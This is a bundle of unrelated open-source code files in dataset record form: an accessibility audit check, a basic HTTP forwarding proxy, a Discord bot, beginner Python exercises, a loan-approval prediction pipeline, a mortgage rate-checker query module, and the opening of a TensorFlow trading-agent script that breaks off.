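            if cut >= need:      # feasible: remember it and try a higher blade
                best = mid
                lo = mid + 1
            else:                # too little cut off: lower the blade
                hi = mid - 1
        return best

    assert max_blade_height([20, 15, 10, 17], 6) == 15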
{"seq_id":"14732399178","text":"from audit.ask import ask\nfrom audit.results import AXSFailure\nfrom audit.techniques.base import Technique\n\n\nclass F30(Technique):\n    code = \"F30\"\n    code_description = \"Failure of Success Criterion 1.1.1 and 1.2.1 due to using text alternatives that are not alternatives (e.g., filenames or placeholder text)\"\n    reading = \"https://www.w3.org/WAI/WCAG21/Techniques/failures/F30\"\n\n    \"\"\"\n    Check each text alternative to see if it is not actually a text alternative for the non-text content.\n    \"\"\"\n\n    def test(self, element):\n        alt_text = element.get_attribute(\"alt\")\n        if alt_text:\n            human_answer = ask(\n                element,\n                f\"The alt text of this element is: '{alt_text}'. Is this alt text a placeholder? E.g. 'picture', '0001', 'chart.jpg'.\",\n                (\"Y\", \"Yes\"),\n                (\"N\", \"No\"),\n            )\n            if human_answer == \"Y\":\n                # placeholder alt text is not a real text alternative\n                yield AXSFailure(\n                    self.code,\n                    \"Using text alternatives that are not alternatives (e.g., filenames or placeholder text)\",\n                    element,\n                )\n","repo_name":"DiversityandAbility/axs-audit","sub_path":"audit/techniques/failures/F30.py","file_name":"F30.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"44295684785","text":"#!/usr/bin/env python3\n# coding=utf-8\nimport socket\nimport select\nimport logging\nimport os\nimport re\nimport time\n\nimport chardet\n\nlogsDir = \"logs\"\nif not os.path.isdir(logsDir):\n    os.mkdir(logsDir)\n\nlogging.basicConfig(level=logging.INFO,\n                    format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n                    datefmt='%a, %d %b %Y %H:%M:%S',\n                    filename='logs/logs.log',\n                    filemode='a')\n\n# IP and port of the C endpoint\nto_addr = ('0.0.0.0', 8889)\n\ndef getAddr(d):\n    a = re.search(\"Host: (.*)\\r\\n\", d)\n    host = a.group(1)\n    a = host.split(\":\")\n    if len(a) == 1:\n        return (a[0], 80)\n    else:\n        return (a[0], int(a[1]))\n\n\nclass Proxy:\n    def __init__(self, addr):\n        self.proxy = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.proxy.bind(addr)\n        self.proxy.listen(10)\n        self.inputs = [self.proxy]\n        self.route = {}\n\n    def serve_forever(self):\n        logging.info('proxy listen...')\n        while 1:\n            readable, _, _ = select.select(self.inputs, [], [])\n            for self.sock in readable:\n                if self.sock == self.proxy:\n                    self.on_join()\n                else:\n                    try:\n                        data = self.sock.recv(8192)\n                    except Exception as e:\n                        logging.error(str(e))\n                        self.on_quit()\n                        continue\n\n                    if not data:\n                        self.on_quit()\n                    else:\n                        try:\n                            self.route[self.sock].send(data)\n                        except Exception as e:\n                            logging.error(str(e))\n                            self.on_quit()\n                            continue\n\n    def on_join(self):\n        client, addr = self.proxy.accept()\n        logging.info(\"proxy client \" + str(addr) + ' connect')\n        data = client.recv(4096)\n        if data:\n            # Split out the request header\n            charset = chardet.detect(data)[\"encoding\"]\n            host_url = data.decode(charset).split(\"\\r\\n\")[0].split(\" \")\n            method, host_addr, protocol = map(lambda x: x.strip(), host_url)\n            # When the proxy method is CONNECT\n            if method == \"CONNECT\":\n                host, port = host_addr.split(\":\")\n            else:\n                host_addr = data.decode(charset).split(\"\\r\\n\")[1].split(\":\")\n                # Default to port 80 when none is specified\n                if 2 == len(host_addr):\n                    host_addr.append(\"80\")\n                name, host, port = map(lambda x: x.strip(), host_addr)\n            # Establish the TCP socket connection\n            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            sock.connect((host, int(port)))\n            self.inputs.append(sock)\n            if method == \"CONNECT\":\n                start_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(time.time()))\n                self.sock.sendall(bytes(\n                    \"HTTP/1.1 200 Connection Established\\r\\nFiddlerGateway: Direct\\r\\nStartTime: {0}\\r\\nConnection: close\\r\\n\\r\\n\".format(\n                        start_time), charset))\n            else:\n                forward = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n                addr = getAddr(data.decode(charset))\n                forward.connect(addr)\n                self.inputs += [client, forward]\n                self.route[client] = forward\n                self.route[forward] = client\n\n        # Remove a finished or broken connection\n\n    def on_quit(self):\n        ls = [self.sock]\n        if self.sock in self.route:\n            ls.append(self.route[self.sock])\n        for s in ls:\n            if s in self.inputs:\n                self.inputs.remove(s)\n            if s in self.route:\n                del self.route[s]\n            s.close()\n\n\nif __name__ == \"__main__\":\n    try:\n        Proxy(('', 8888)).serve_forever()\n    except KeyboardInterrupt:\n        
logging.error(\"KeyboardInterrupt\")","repo_name":"zhanghtt/crawl-new2","sub_path":"projects/sniffer/proxyserver5.py","file_name":"proxyserver5.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28305106219","text":"import importlib\nimport os\nimport os.path\nimport traceback\nimport sys\nimport json\nimport discord\nimport sqlite3\nimport asyncio\nfrom discord import Game, DMChannel, Embed\nfrom discord.ext import commands\nfrom datetime import datetime\nfrom util import utils, vars, db\nfrom util.prefix_manager import PrefixManager\n\nintents = discord.Intents.none()\nintents.guilds = True\nintents.members = True\nintents.bans = True\nintents.emojis = True\nintents.voice_states = True\nintents.presences = True\nintents.messages = True\nintents.message_content = True\nintents.guild_messages = True\nintents.dm_messages = True\nintents.reactions = True\nintents.guild_reactions = True\n\n\nclass Eschamali(commands.Bot):\n def __init__(self):\n self.config = {}\n self.pm = PrefixManager(self)\n self.start_time = datetime.now()\n self.tbs = []\n self.utils = utils\n self.vars = vars\n self.db = db\n with open(self.vars.CONFIG_FILE) as f:\n self.config = json.load(f)\n super().__init__(command_prefix=self.pm.get_prefix,\n owner_ids=self.config['owners'],\n activity=Game(self.config['status']),\n help_command=None,\n intents=intents)\n\n def reload_utils(self):\n importlib.reload(utils)\n utils.reload()\n importlib.reload(vars)\n importlib.reload(db)\n self.utils = utils\n self.vars = vars\n self.db = db\n\n def all_cogs(self):\n return [file.replace('.py', '') for file in os.listdir(self.vars.COGS_DIR) if file.endswith('.py')]\n\n def loaded_cogs(self, lower=True):\n return [c.lower() if lower else c for c in self.cogs]\n\n async def load_cogs(self):\n to_load = self.all_cogs()\n if 'perms' in to_load:\n to_load.insert(0, to_load.pop(to_load.index('perms')))\n for cog in to_load:\n try:\n await self.load_extension(f'{self.vars.COGS_DIR_NAME}.{cog}')\n except Exception as e:\n self.vars.LOGGER.error(e)\n\n def _run(self):\n if (self.config):\n self.start_time = datetime.now()\n self.run(self.config['token'])\n\n async def on_ready(self):\n for c in DEFAULT_COMMANDS:\n self.add_command(c)\n await self.load_cogs()\n self.pm.load_prefixes()\n\n async def on_message(self, msg):\n process = True\n m = msg.content\n if m.startswith(self.pm.prefix):\n cmd = m.split(' ')[0].split(self.pm.prefix)[1]\n if not cmd in self.pm.cmd_prefixes['Base'] or cmd == 'help':\n process = False\n if msg.guild:\n channel = f'[{msg.guild.id}]'\n elif isinstance(msg.channel, DMChannel):\n channel = f'({msg.channel.recipient})'\n if not m.startswith(self.pm.prefix):\n process = False\n elif not msg.author.id in self.owner_ids:\n process = False\n else:\n channel = f'({msg.channel.name})'\n self.vars.LOGGER.info('{0} {1.author}: {1.content}'.format(channel, msg))\n if msg.author.bot:\n return\n if process:\n await self.process_commands(msg)\n\n async def on_command_error(self, ctx, error):\n if isinstance(error, commands.CommandNotFound):\n return\n elif isinstance(error, commands.NotOwner):\n return\n elif isinstance(error, commands.CheckAnyFailure) or isinstance(error, commands.CheckFailure):\n await ctx.send(error)\n elif isinstance(error, commands.TooManyArguments):\n await ctx.send('Too many argument(s).')\n elif isinstance(error, commands.BadArgument):\n await ctx.send('Invalid argument(s).')\n elif 
isinstance(error, commands.MissingRequiredArgument):\n return await ctx.send('Missing argument(s).')\n elif isinstance(error, commands.CommandInvokeError):\n o_error = error.original\n if isinstance(o_error, discord.errors.Forbidden):\n if ctx.cog.qualified_name == 'Roles':\n await ctx.send('I do not have enough permissions to add that role.')\n elif isinstance(error, discord.errors.HTTPException):\n if ctx.command.name == 'ev':\n await ctx.send('Output too big.')\n elif isinstance(error, sqlite3.Error):\n await ctx.send('There was a database error.')\n if ctx.cog:\n self.vars.LOGGER.error(f'({ctx.author}){ctx.cog.qualified_name}|{ctx.message.content}|{error}')\n # All other Errors not returned come here. And we can just print the default TraceBack.\n if len(self.tbs) >= 50:\n self.tbs = []\n self.tbs.insert(0, ''.join(traceback.format_exception(type(error), error, error.__traceback__)))\n print('Ignoring exception in command {}:'.format(ctx.command), file=sys.stderr)\n traceback.print_exception(type(error), error, error.__traceback__, file=sys.stderr)\n\n\n\"\"\"\nHELP COMMAND FUNCTIONS\n\"\"\"\n\n\n@commands.command(description='Look at help for cogs and commands',\n help='*args* can be a cog or command name, not case-sensitive')\nasync def help(ctx, *, args=None):\n if not args:\n return await send_bot_help(ctx)\n else:\n args = args.lower()\n for name, cog in ctx.bot.cogs.items():\n if name.lower() == args:\n return await send_cog_help(ctx, cog)\n for command in ctx.bot.commands:\n if args == command.name or (command.aliases and args in command.aliases):\n try:\n if command.commands:\n return await send_group_help(ctx, command)\n except:\n return await send_cmd_help(ctx, command)\n await ctx.send('Invalid cog or command.')\n\n\nasync def send_bot_help(ctx):\n e = Embed(title='Eschamali Help')\n e.description = '\\n'.join(sorted(ctx.bot.loaded_cogs(lower=False)))\n e.set_footer(text=f'{ctx.bot.pm.help_prefix}help ')\n e.colour = discord.Colour.purple()\n await ctx.send(embed=e)\n\n\nasync def send_cog_help(ctx, cog):\n e = Embed(title=f'[{_get_cog_prefix(ctx, cog)}]{cog.qualified_name} Help')\n e.description = (cog.description + '\\n' if cog.description else '') + \\\n '\\n'.join([f'**{c.name}** {c.brief if c.brief else \"\"}' for c in cog.get_commands()])\n e.set_footer(text=f'{ctx.bot.pm.help_prefix}help ')\n e.colour = discord.Colour.purple()\n await ctx.send(embed=e)\n\n\nasync def send_group_help(ctx, group):\n prefix = _get_cog_prefix(ctx, group.cog)\n e = Embed(title=f'{prefix}{group.name} subcommands')\n e.description = group.description\n for c in group.commands:\n e.add_field(name=f'{prefix}{group.name} {c.name}',\n value=c.description + ('\\nAliases: ' + ' '.join(c.aliases)) if c.aliases else '',\n inline=True)\n e.colour = discord.Colour.purple()\n await ctx.send(embed=e)\n\n\nasync def send_cmd_help(ctx, command):\n prefix = _get_cog_prefix(ctx, command.cog) if command.name != 'help' else ctx.bot.pm.help_prefix\n e = Embed(title=f'{prefix}{command.name} {command.signature}')\n e.add_field(name='Description',\n value=command.description,\n inline=True)\n e.add_field(name='Help',\n value=command.help,\n inline=False)\n if command.aliases:\n e.set_footer(text=f'Aliases: {\" \".join(command.aliases)}')\n e.colour = discord.Colour.purple()\n await ctx.send(embed=e)\n\n\ndef _get_cog_prefix(ctx, cog):\n if cog and cog.qualified_name in ctx.bot.pm.cog_prefixes:\n return ctx.bot.pm.cog_prefixes[cog.qualified_name]\n return ctx.bot.pm.prefix\n\n\n\"\"\"\nOWNER 
FUNCTIONS\n\"\"\"\n\n\n@commands.command(description='Shows how long the bot has been running',\n help='Owners only',\n brief='Show bot uptime')\n@commands.is_owner()\nasync def uptime(ctx):\n await ctx.send(str(datetime.now() - ctx.bot.start_time).split('.')[0])\n\n\n@commands.command(aliases=['guilds'],\n description='Shows servers the bot is in',\n help='Owners only',\n brief='Show bot servers')\n@commands.is_owner()\nasync def servers(ctx):\n guilds = sorted(ctx.bot.guilds, key=lambda g: g.id)\n output = f'Connected to `{len(guilds)}` guilds.\\n'\n output += '```xl\\n'\n output += '%s | %s | %s\\n%s | %s | %s\\n' % ('Server Name'.center(50),\n 'Server ID'.center(20),\n 'Users'.center(10),\n '-' * 50, '-' * 20, '-' * 10)\n for g in guilds:\n output += '%50s | %s | %s\\n' % (g.name, str(g.id).center(20), str(g.member_count).center(10))\n output += '```'\n await ctx.send(output)\n\n\n@commands.command(aliases=['cs'],\n description='Change bot status for this session',\n help='Owners only',\n brief='Change bot status')\n@commands.is_owner()\nasync def changestatus(ctx, *, msg):\n await ctx.bot.change_presence(activity=Game(msg))\n\n\n@commands.command(aliases=['cds'],\n description='Change default bot status for current and future sessions',\n help='Owners only',\n brief='Change default bot status')\n@commands.is_owner()\nasync def changedefaultstatus(ctx, *, msg):\n ctx.bot.config['status'] = msg\n await changestatus(ctx, msg=msg)\n with open(ctx.bot.vars.CONFIG_FILE, 'w') as f:\n json.dump(ctx.bot.config, f)\n await ctx.send('Changed default status to ' + msg)\n\n\n@commands.command(description='Shutdown the bot',\n help='Owners only',\n brief='Shutdown bot')\n@commands.is_owner()\nasync def shutdown(ctx):\n await ctx.send('Shutting down...')\n await ctx.bot.close()\n\n\n@commands.command(description='Update bot files with latest from github',\n help='Owners only',\n brief='Update from github')\n@commands.is_owner()\nasync def git(ctx):\n stream = os.popen('git pull origin master')\n output = stream.read()\n stream2 = os.popen('git log -1')\n output2 = stream2.read().split('\\n')\n output2 = '\\n'.join([o.strip() for o in output2 if not o.startswith('commit ') and not o.startswith('Author') and len(o) > 0])\n await ctx.send(f'```{output}\\n\\n{output2}```')\n if not output.startswith('Already up to date.'):\n to_reload = []\n for line in output.split('\\n'):\n if line.strip().startswith('cogs/'):\n cog = line.strip().split(' ')[0].split('/')[1].split('.')[0]\n to_reload.append(cog)\n if to_reload:\n await ctx.bot.cogs['General']._reload_all(ctx, to_reload)\n else:\n await ctx.send('No cogs to reload. 
Might require restart.')\n\n\n@commands.command(aliases=['t', 'T', 'q', 'Q'],\n                  description='Run test.py',\n                  help='Owners only',\n                  brief='Test')\n@commands.is_owner()\nasync def test(ctx, timeout=300):\n    async def test_run():\n        try:\n            coro = asyncio.create_subprocess_shell('python3 test.py', stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)\n            proc = await asyncio.wait_for(coro, timeout)\n            stdout, stderr = await proc.communicate()\n\n            if stdout:\n                await ctx.send(f'```{stdout.decode()}```')\n            if stderr:\n                await ctx.send(f'```{stderr.decode()}```')\n        except asyncio.exceptions.TimeoutError as e:\n            await ctx.send(f'```Timed out.```')\n    await ctx.send('```Running test.py```')\n    await test_run()\n\nDEFAULT_COMMANDS = [uptime, servers, changestatus, changedefaultstatus, shutdown, git, help, test]\nEschamali()._run()\n","repo_name":"Barkuto/eschamali","sub_path":"eschamali.py","file_name":"eschamali.py","file_ext":"py","file_size_in_byte":11909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"36111246806","text":"# Crie um programa que leia duas notas de um aluno e calcule a sua média, mostrando uma mensagem no final, de acordo\n# com a média atingida:\n# - Média abaixo de 5.0: REPROVADO\n# - Média entre 5.0 e 6.9: RECUPERAÇÃO\n# - Média 7.0 ou superior: APROVADO\n\nnota1 = float(input(\"Informe a \\033[1mprimeira nota\\033[m: \"))\nnota2 = float(input(\"Informe a \\033[1msegunda nota\\033[m: \"))\n\nmedia = (nota1 + nota2) / 2\n\nprint(\"Com as notas \\033[1;32m{}\\033[m e \\033[1;32m{}\\033[m, sua média é de \\033[1;32m{}.\"\n      .format(nota1, nota2, media))\n\nif media < 5.0:\n    print(\"\\033[1;31mSITUAÇÃO: REPROVADO\")\nelif 5.0 <= media < 7.0:\n    print(\"\\033[1;33mSITUAÇÃO: RECUPERAÇÃO\")\nelse:\n    print(\"\\033[1;34mSITUAÇÃO: APROVADO\")\n","repo_name":"SuxPorT/python-exercises","sub_path":"Mundo 2 - Estruturas de Controle/Desafio #040.py","file_name":"Desafio #040.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"4780639336","text":"import sys\ninput = sys.stdin.readline\n\narray = []\nisbreak = False\nfor _ in range(9):\n    array.append(int(input()))\n\narray.sort()\ngoal = sum(array) - 100\n\nfor i in range(len(array)-1,-1,-1):\n    for j in range(i):  # j < i avoids pairing an index with itself and index shifts on delete\n        if array[i] + array[j] == goal:\n            del array[i],array[j]\n            isbreak = True\n            break\n    if isbreak:\n        break\n    \nfor num in array:\n    print(num)","repo_name":"jeilbitna/project","sub_path":"baekjoon/baekjoon2309.py","file_name":"baekjoon2309.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
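The nine-dwarfs record above compares index pairs in O(n^2); because exactly one pair has to be discarded, a single hash-map pass finds the two extra heights in O(n). A sketch (it assumes, as the problem guarantees, that a valid pair exists):

    def seven_dwarfs(heights):
        excess = sum(heights) - 100
        seen = {}
        for i, h in enumerate(heights):
            if excess - h in seen:   # h and its stored partner are the two to drop
                j = seen[excess - h]
                return [x for k, x in enumerate(heights) if k not in (i, j)]
            seen[h] = i
        return heights

    print(sorted(seven_dwarfs([20, 7, 23, 19, 10, 15, 25, 8, 13])))  # the seven printed heights sum to 100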
{"seq_id":"40379709369","text":"import os,sys\r\nfrom src.exception import CustomException\r\nfrom src.logger import logging\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom dataclasses import dataclass\r\nfrom src.utils import load_object\r\n\r\nclass PredictionPipeline:\r\n    def __init__(self):\r\n        pass\r\n\r\n\r\n    def predict(self,feature):\r\n        preprocessor_path=os.path.join(\"artifacts/Data_Transformation\",\"preprocessor.pkl\")\r\n        model_path=os.path.join(\"artifacts/model_trainer\",\"model.pkl\")\r\n\r\n        process=load_object(preprocessor_path)\r\n        model=load_object(model_path)\r\n\r\n        scaled=process.transform(feature)\r\n        pred=model.predict(scaled)\r\n\r\n        return pred\r\n\r\n\r\nclass CustomClass:\r\n    def __init__(self,\r\n                 Gender:int,\r\n                 Married:int,\r\n                 Dependents:int,\r\n                 Education:int,\r\n                 Self_Employed:int,\r\n                 ApplicantIncome:int,\r\n                 CoapplicantIncome:int,\r\n                 LoanAmount:int,\r\n                 Loan_Amount_Term:int,\r\n                 Credit_History:int,\r\n                 Property_Area:int):\r\n        # the original assignments ended with trailing commas, which silently\r\n        # turned every attribute into a one-element tuple\r\n        self.Gender=Gender\r\n        self.Married=Married\r\n        self.Dependents=Dependents\r\n        self.Education=Education\r\n        self.Self_Employed=Self_Employed\r\n        self.ApplicantIncome=ApplicantIncome\r\n        self.CoapplicantIncome=CoapplicantIncome\r\n        self.LoanAmount=LoanAmount\r\n        self.Loan_Amount_Term=Loan_Amount_Term\r\n        self.Credit_History=Credit_History\r\n        self.Property_Area=Property_Area\r\n\r\n\r\n\r\n    def DataFrame(self):\r\n        try:\r\n            custom_input={\r\n                \"Gender\":[self.Gender],\r\n                \"Married\":[self.Married],\r\n                \"Dependents\":[self.Dependents],\r\n                \"Education\":[self.Education],\r\n                \"Self_Employed\":[self.Self_Employed],\r\n                \"ApplicantIncome\":[self.ApplicantIncome],\r\n                \"CoapplicantIncome\":[self.CoapplicantIncome],\r\n                \"LoanAmount\":[self.LoanAmount],\r\n                \"Loan_Amount_Term\":[self.Loan_Amount_Term],\r\n                \"Credit_History\":[self.Credit_History],\r\n                \"Property_Area\":[self.Property_Area]\r\n\r\n            }\r\n\r\n            data=pd.DataFrame(custom_input)\r\n\r\n            return data\r\n        except Exception as e:\r\n            raise CustomException(e,sys)\r\n    ","repo_name":"NikhilPaulzagde/Data-Science-End-to-End-Project","sub_path":"Loan Approval Predictor/src/pipeline/prediction_pipeline.py","file_name":"prediction_pipeline.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
{"seq_id":"4056397120","text":"import oursql\n\nfrom utils import (\n    parse_args, execute_query, parse_str, parse_arm,\n    parse_state_abbr)\n\nPARAMETERS = {\n    'loan_type': [\n        parse_str,\n        'There was an error processing value |%s| for loan_type parameter',\n        'CONF',\n    ],\n    'rate_structure': [\n        parse_str,\n        'There was an error processing value |%s| for rate_structure parameter',\n        'Fixed',\n    ],\n    'arm_type': [\n        parse_arm,\n        'The value |%s| does not look like an ARM type parameter',\n        '5/1',\n    ],\n    'loan_term': [\n        int,\n        'Loan term must be a numeric value, |%s| provided',\n        30,\n    ],\n    'price': [\n        float,\n        'House price must be a numeric value, |%s| provided',\n        200000,\n    ],\n    'loan_amount': [\n        float,\n        'Loan amount must be a numeric value, |%s| provided',\n        180000,\n    ],\n    'state': [\n        parse_state_abbr,\n        'State must be a state abbreviation, |%s| provided',\n        'DC',\n    ],\n    'fico': [\n        int,\n        'FICO must be a numeric, |%s| provided',\n        720\n    ],\n    'minfico': [\n        int,\n        'MinFICO must be an integer, |%s| provided',\n        700\n    ],\n    'maxfico': [\n        int,\n        'MaxFICO must be an integer, |%s| provided',\n        719\n    ],\n    'points': [\n        float,\n        'Points value must be a numeric, |%s| provided',\n        0\n    ],\n    'lock': [\n        int,\n        'Lock value must be an integer, |%s| provided',\n        60\n    ],\n    #'property_type': [\n    #    parse_str,\n    #    'There was an error processing |%s| for property type',\n    #    'CONDO',\n    #]\n}\n\n\nclass RateChecker(object):\n    \"\"\" This is the class that powers the rate checker. It embodies\n    all the business and querying logic for the rate checker. 
\"\"\"\n\n def __init__(self):\n \"\"\"Set parameters to default values.\"\"\"\n self.errors = []\n self.data = []\n self.status = \"OK\"\n self.request = {}\n\n def process_request(self, request):\n \"\"\"The main function which processes request and returns result\n back.\"\"\"\n\n results = parse_args(request, PARAMETERS)\n self.request = results['results']\n if len(results['errors']) > 0:\n self.errors = results['errors']\n self.status = 'Error'\n self._defaults()\n self._data()\n return self._output()\n\n def _output(self):\n \"\"\"Compile response\"\"\"\n return {\n \"status\": self.status,\n \"request\": self.request,\n \"data\": self.data,\n \"errors\": self.errors,\n }\n\n def _data(self):\n \"\"\"Calculate results.\"\"\"\n data = []\n\n ltv = float(self.request['loan_amount']) / self.request['price'] * 100\n minltv = maxltv = ltv\n\n # lock times\n locks = {\n 30: [0, 30],\n 45: [31, 45],\n 60: [46, 60],\n }\n minlock = maxlock = self.request['lock']\n if self.request['lock'] in locks:\n minlock = locks[self.request['lock']][0]\n maxlock = locks[self.request['lock']][1]\n\n qry_args = [\n self.request['loan_amount'], self.request['loan_amount'],\n self.request['minfico'], self.request['maxfico'], minltv, maxltv,\n self.request['state'], self.request['loan_amount'],\n self.request['loan_amount'], self.request['minfico'],\n self.request['maxfico'], minltv, maxltv, self.request['state'],\n minltv, maxltv, self.request['minfico'], self.request['maxfico'],\n self.request['loan_amount'], self.request['loan_amount'],\n self.request['state'], self.request['rate_structure'].upper(),\n self.request['loan_term'], self.request['loan_type'].upper(),\n minlock, maxlock]\n\n query = \"\"\"\n SELECT\n r.Institution AS r_institution,\n r.Lock AS r_lock,\n r.BaseRate AS r_baserate,\n r.TotalPoints AS r_totalpoints,\n r.Planid AS r_planid,\n COALESCE(adjr.adjvalueR,0) AS adjvaluer,\n COALESCE(adjp.adjvalueP,0) AS adjvaluep\n FROM\n oah_rates r\n INNER JOIN oah_limits l ON r.planid = l.planid\n LEFT OUTER JOIN (\n SELECT\n planid,\n sum(adjvalue) adjvalueR\n FROM oah_adjustments\n WHERE 1=1\n AND (\n (MINLOANAMT <= ? AND MAXLOANAMT >= ? AND MINLOANAMT <> 0 AND MAXLOANAMT <> 999999999)\n OR (MINFICO <= ? AND MAXFICO >= ? AND (MINFICO > 0 OR (MINFICO <> 0 AND MAXFICO <> 999)) AND MINLTV <= ? AND MAXLTV >= ?)\n OR (STATE=?)\n )\n AND AffectRateType='R'\n GROUP BY planid\n ) adjr ON adjr.PlanID = r.planid\n LEFT OUTER JOIN (\n SELECT\n planid,\n sum(adjvalue) adjvalueP\n FROM oah_adjustments\n WHERE 1=1\n AND (\n (MINLOANAMT <= ? AND MAXLOANAMT >= ? AND MINLOANAMT <> 0 AND MAXLOANAMT <> 999999999)\n OR (MINFICO <= ? AND MAXFICO >= ? AND (MINFICO > 0 OR (MINFICO <> 0 AND MAXFICO <> 999)) AND MINLTV <= ? AND MAXLTV >= ?)\n OR (STATE=?)\n )\n\n AND AffectRateType='P'\n GROUP BY planid\n ) adjp ON adjp.PlanID = r.planid\n\n WHERE 1=1\n -- Limits stuff\n AND (l.minltv <= ? AND l.maxltv >= ?)\n AND (l.minfico <= ? AND l.maxfico >= ?)\n AND (l.minloanamt <= ? AND l.maxloanamt >= ?)\n AND (r.stateid=?)\n AND r.loanpurpose='PURCH'\n AND r.pmttype = ?\n AND r.loanterm = ?\n AND r.loantype = ?\n AND r.lock BETWEEN ? AND ?\n %s\n ORDER BY r_Institution, r_BaseRate\n \"\"\"\n\n additional_query = \"\"\n if self.request['rate_structure'].upper() == 'ARM':\n additional_query = \"AND r.io = 0 AND r.intadjterm = ? 
\"\n qry_args.append(\n self.request['arm_type'][:self.request['arm_type'].index('/')])\n\n rows = execute_query(\n query % additional_query, qry_args, oursql.DictCursor)\n\n self.data = self._calculate_results(rows)\n\n def bucket_results(self, result):\n \"\"\" This API allows users to draw a histogram at the end, so we bucket\n the results here. \"\"\"\n\n buckets = {}\n for row in result:\n if result[row]['final_rates'] in buckets:\n buckets[result[row]['final_rates']] += 1\n else:\n buckets[result[row]['final_rates']] = 1\n return buckets\n\n def closer_to_zero(self, original_final_points, new_final_points):\n \"\"\" For each plan, we pick the results with the final points that are\n closest to zero. \"\"\"\n\n if abs(new_final_points) < abs(original_final_points):\n return True\n elif abs(new_final_points) == abs(original_final_points):\n return new_final_points > 0 and original_final_points < 0\n return False\n\n def _calculate_results(self, data):\n \"\"\" Further apply filters to the results, based on calculations made\n during the SQL query. \"\"\"\n\n maxpoints = self.request['points'] + 0.5\n minpoints = self.request['points'] - 0.5\n\n filtered_on_points = []\n\n for row in data:\n row['final_points'] = row['adjvaluep'] + row['r_totalpoints']\n final_points = row['final_points']\n if final_points <= maxpoints and final_points >= minpoints:\n row['final_rates'] = \"%.3f\" % (\n row['adjvaluer'] + row['r_baserate'])\n filtered_on_points.append(row)\n\n result = {}\n for row in filtered_on_points:\n #TODO: can be combined\n if row['r_planid'] not in result:\n result[row['r_planid']] = row\n elif self.closer_to_zero(\n result[row['r_planid']]['final_points'], row['final_points']):\n result[row['r_planid']] = row\n\n return self.bucket_results(result)\n\n def _defaults(self):\n \"\"\"Set defaults, calculate intermediate values for args.\"\"\"\n self._set_ficos()\n self._set_loan_amount()\n tmp = dict((k, v[2]) for k, v in PARAMETERS.iteritems())\n tmp.update(self.request)\n self.request = tmp\n if self.request['rate_structure'].lower() == 'fixed':\n del self.request['arm_type']\n if 'fico' in self.request:\n del self.request['fico']\n\n def _set_loan_amount(self):\n \"\"\" Set loan_amount and price values. If one is not provided, determine\n using the other. 
\"\"\"\n\n req = self.request\n amount = 'loan_amount'\n\n if amount in req and 'price' not in req:\n req['price'] = int(req[amount] * 1.1)\n elif amount not in req and 'price' in req:\n req[amount] = int(req['price'] * 0.9)\n elif amount in req and 'price' in req and req[amount] > req['price']:\n req[amount], req['price'] = req['price'], req[amount]\n\n def _set_ficos(self):\n \"\"\" Set the min and max FICO scores \"\"\"\n req = self.request\n\n if 'minfico' not in req and 'maxfico' not in req and 'fico' in req:\n req['minfico'] = req['fico']\n req['maxfico'] = req['fico']\n\n # Only one of them is set\n elif 'minfico' in req and 'maxfico' not in req:\n req['maxfico'] = req['minfico']\n elif 'minfico' not in req and 'maxfico' in req:\n req['minfico'] = req['maxfico']\n elif ('minfico' in req and 'maxfico' in req and\n req['minfico'] > req['maxfico']):\n req['minfico'], req['maxfico'] = req['maxfico'], req['minfico']\n\n # so that results for minfico=700,maxfico=720 and\n # minfico=720,maxfico=740 don't overlap\n\n if ('maxfico' in req and 'minfico' in req and\n req['maxfico'] != req['minfico']):\n self.request['maxfico'] -= 1\n","repo_name":"fna/oah-backend","sub_path":"app/rate_checker.py","file_name":"rate_checker.py","file_ext":"py","file_size_in_byte":10477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5139200279","text":"import numpy as np\n\nfrom agent.Agent import Agent\nfrom data.data_manager import get_data_chunk\nfrom environment.EnvPlayer import PlayGround\nfrom environment.Environment import TradeEnvironment\nfrom preprocess.data_pre_process import create_data_frame\n\nimport tensorflow as tf\nimport os\n\ndirname = os.path.dirname(__file__)\nbase_path = dirname + \"/model_saved\"\nmodel_path = \"{}/model\".format(base_path)\n\nbase_path = dirname + \"/logs\"\nlog_path = \"{}\".format(base_path)\n\nprint(\"Model path => {}\".format(model_path))\nprint(\"Log path => {}\".format(log_path))\n\nobs_length = 21\naction_size = 3\n\n# Observations Count\nobservations = tf.placeholder(shape=[1, obs_length], dtype=tf.float32)\n# 0,1,2 BUY, STAY, SELL\nactions = tf.placeholder(shape=[None], dtype=tf.int32)\n# +1, -1 with discount\nrewards = tf.placeholder(shape=[None], dtype=tf.float32)\n\n# model\nY = tf.layers.dense(observations, 200, activation=tf.nn.relu)\nY = tf.layers.dense(Y, 100, activation=tf.nn.relu)\nY = tf.layers.dense(Y, 50, activation=tf.nn.relu)\nYlogits = tf.layers.dense(Y, action_size)\n\n# Sample an action from predicted probabilities\nsample_op = tf.multinomial(logits=tf.reshape(Ylogits, shape=(1, 3)), num_samples=1)\n\n# loss\ncross_entropies = tf.losses.softmax_cross_entropy(onehot_labels=tf.one_hot(actions, action_size),\n logits=Ylogits)\n\nloss = tf.reduce_sum(rewards * cross_entropies)\n\n# Training Operation\noptimizer = tf.train.RMSPropOptimizer(learning_rate=0.001, decay=0.99)\ntrain_op = optimizer.minimize(loss)\n\ninit_op = tf.initialize_all_variables()\n\nsaver = tf.train.Saver()\n\n\ndef 